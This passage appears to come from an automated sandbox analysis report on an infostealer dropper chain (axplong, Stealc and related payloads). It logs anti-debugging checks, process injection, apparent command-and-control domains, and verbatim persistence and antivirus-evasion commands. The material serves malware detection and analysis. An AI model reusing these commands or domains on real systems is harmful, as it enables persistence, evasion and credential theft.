find Processors Control Blocks. Please,
                          Source: svchost.exe, 00000003.00000002.3751595435.0000023C2962B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                          Source: svchost.exe, 00000003.00000002.3751892147.0000023C2964E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: svchost.exe, 00000004.00000002.3749895131.0000020504AAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                          Source: svchost.exe, 00000004.00000003.2445813332.0000020505352000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000SCSI\DiskVMware__Virtual_disk____2.0_SCSI\DiskVMware__Virtual_disk____SCSI\DiskVMware__SCSI\VMware__Virtual_disk____2VMware__Virtual_disk____2GenDisk
                          Source: svchost.exe, 00000003.00000002.3752518295.0000023C29664000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000e1}
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeAPI call chain: ExitProcess graph end nodegraph_17-77360
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeAPI call chain: ExitProcess graph end nodegraph_17-77349
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeAPI call chain: ExitProcess graph end nodegraph_17-77346
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeAPI call chain: ExitProcess graph end nodegraph_17-78523
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeAPI call chain: ExitProcess graph end nodegraph_17-77368
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeAPI call chain: ExitProcess graph end nodegraph_17-77188
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeAPI call chain: ExitProcess graph end nodegraph_17-77389
                          Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                          Anti Debugging

                          barindex
                          Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\Desktop\file.exeCode function: 6_2_04E10B42 Start: 04E10B4C End: 04E10B516_2_04E10B42
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeOpen window title or class name: regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeOpen window title or class name: gbdyllo
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeOpen window title or class name: procmon_window_class
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeOpen window title or class name: ollydbg
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeOpen window title or class name: filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: NTICE
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: SICE
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: SIWVID
                          Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exeProcess queried: DebugPort
                          Source: C:\Users\user\Desktop\file.exeCode function: 6_2_04E10370 rdtsc 6_2_04E10370
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_0078AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0078AD48
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_007745C0 VirtualProtect ?,00000004,00000100,0000000017_2_007745C0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_00789860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,17_2_00789860
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 13_2_00C8645B mov eax, dword ptr fs:[00000030h]13_2_00C8645B
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 13_2_00C8A1C2 mov eax, dword ptr fs:[00000030h]13_2_00C8A1C2
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_00789750 mov eax, dword ptr fs:[00000030h]17_2_00789750
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_00787850 GetProcessHeap,HeapAlloc,GetUserNameA,17_2_00787850
                          Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
                          Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess token adjusted: Debug
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_0078AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0078AD48
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_0078CEEA SetUnhandledExceptionFilter,17_2_0078CEEA
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_0078B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_0078B33A
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C95AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_6C95AC62
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeMemory protected: page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Source: Yara matchFile source: Process Memory Space: stealc_default2.exe PID: 4092, type: MEMORYSTR
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                          Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exeMemory written: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe base: 400000 value starts with: 4D5A
                          Source: 550b7cfe5f.exe, 0000002A.00000002.3470804660.0000000000A71000.00000040.00000001.01000000.00000018.sdmpString found in binary or memory: scriptyprefej.store
                          Source: 550b7cfe5f.exe, 0000002A.00000002.3470804660.0000000000A71000.00000040.00000001.01000000.00000018.sdmpString found in binary or memory: navygenerayk.store
                          Source: 550b7cfe5f.exe, 0000002A.00000002.3470804660.0000000000A71000.00000040.00000001.01000000.00000018.sdmpString found in binary or memory: founpiuer.store
                          Source: 550b7cfe5f.exe, 0000002A.00000002.3470804660.0000000000A71000.00000040.00000001.01000000.00000018.sdmpString found in binary or memory: necklacedmny.store
                          Source: 550b7cfe5f.exe, 0000002A.00000002.3470804660.0000000000A71000.00000040.00000001.01000000.00000018.sdmpString found in binary or memory: thumbystriw.store
                          Source: 550b7cfe5f.exe, 0000002A.00000002.3470804660.0000000000A71000.00000040.00000001.01000000.00000018.sdmpString found in binary or memory: fadehairucw.store
                          Source: 550b7cfe5f.exe, 0000002A.00000002.3470804660.0000000000A71000.00000040.00000001.01000000.00000018.sdmpString found in binary or memory: crisiwarny.store
                          Source: 550b7cfe5f.exe, 0000002A.00000002.3470804660.0000000000A71000.00000040.00000001.01000000.00000018.sdmpString found in binary or memory: presticitpo.store
                          Source: 550b7cfe5f.exe, 0000002A.00000002.3470804660.0000000000A71000.00000040.00000001.01000000.00000018.sdmpString found in binary or memory: opinieni.store
                          Source: GOLD1234.exe, 0000002D.00000002.2747149594.0000000001251000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: servicedny.site
                          Source: GOLD1234.exe, 0000002D.00000002.2747149594.0000000001251000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: authorisev.site
                          Source: GOLD1234.exe, 0000002D.00000002.2747149594.0000000001251000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: faulteyotk.site
                          Source: GOLD1234.exe, 0000002D.00000002.2747149594.0000000001251000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: dilemmadu.site
                          Source: GOLD1234.exe, 0000002D.00000002.2747149594.0000000001251000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: contemteny.site
                          Source: GOLD1234.exe, 0000002D.00000002.2747149594.0000000001251000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: goalyfeastz.site
                          Source: GOLD1234.exe, 0000002D.00000002.2747149594.0000000001251000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: opposezmny.site
                          Source: GOLD1234.exe, 0000002D.00000002.2747149594.0000000001251000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: seallysl.site
                          Source: RDX123456.exe, 00000030.00000000.2294311234.00000000003C6000.00000002.00000001.01000000.0000001C.sdmpString found in binary or memory: computeryrati.site
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_00789600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,17_2_00789600
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 451000
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 466000
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 46D000
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 46E000
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: AF5008
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user~1\AppData\Local\Temp\1000066001\stealc_default2.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe "C:\Users\user~1\AppData\Local\Temp\1000477001\Offnewhere.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe "C:\Users\user~1\AppData\Local\Temp\1000817001\splwow64.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe "C:\Users\user~1\AppData\Local\Temp\1000828001\new_v8.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe "C:\Users\user~1\AppData\Local\Temp\1000833001\f55899dae2.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe "C:\Users\user~1\AppData\Local\Temp\1000857001\550b7cfe5f.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe "C:\Users\user~1\AppData\Local\Temp\1000965001\GOLD1234.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe "C:\Users\user~1\AppData\Local\Temp\1001096001\RDX123456.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 197036
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "CRAWFORDFILLEDVERIFYSCALE" Mtv
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Twisted + ..\Molecular + ..\Sponsorship + ..\Various + ..\Witch + ..\Spirit + ..\See + ..\Fitting T
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Jurisdiction.pif T
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess created: unknown unknown
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
                          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O"
                          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O"
                          Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\ecocraft.url" & echo url="c:\users\user\appdata\local\greentech dynamics\ecocraft.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\ecocraft.url" & exit
                          Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\ecocraft.url" & echo url="c:\users\user\appdata\local\greentech dynamics\ecocraft.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\ecocraft.url" & exit
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C9A4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,17_2_6C9A4760
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C881C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,17_2_6C881C30
                          Source: splwow64.exe, 00000013.00000003.2057229298.0000000004B82000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 0000001F.00000003.2155575481.00000000042CA000.00000004.00000800.00020000.00000000.sdmp, Jurisdiction.pif, 0000001F.00000000.2135790083.0000000000336000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                          Source: axplong.exe, axplong.exe, 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Program Manager
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 13_2_00C6D312 cpuid 13_2_00C6D312
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,17_2_00787B90
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1001172001\Set-up.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1001172001\Set-up.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1001471001\c8908bf20d.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1001471001\c8908bf20d.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1001472001\2dc588f7b5.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1001472001\2dc588f7b5.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
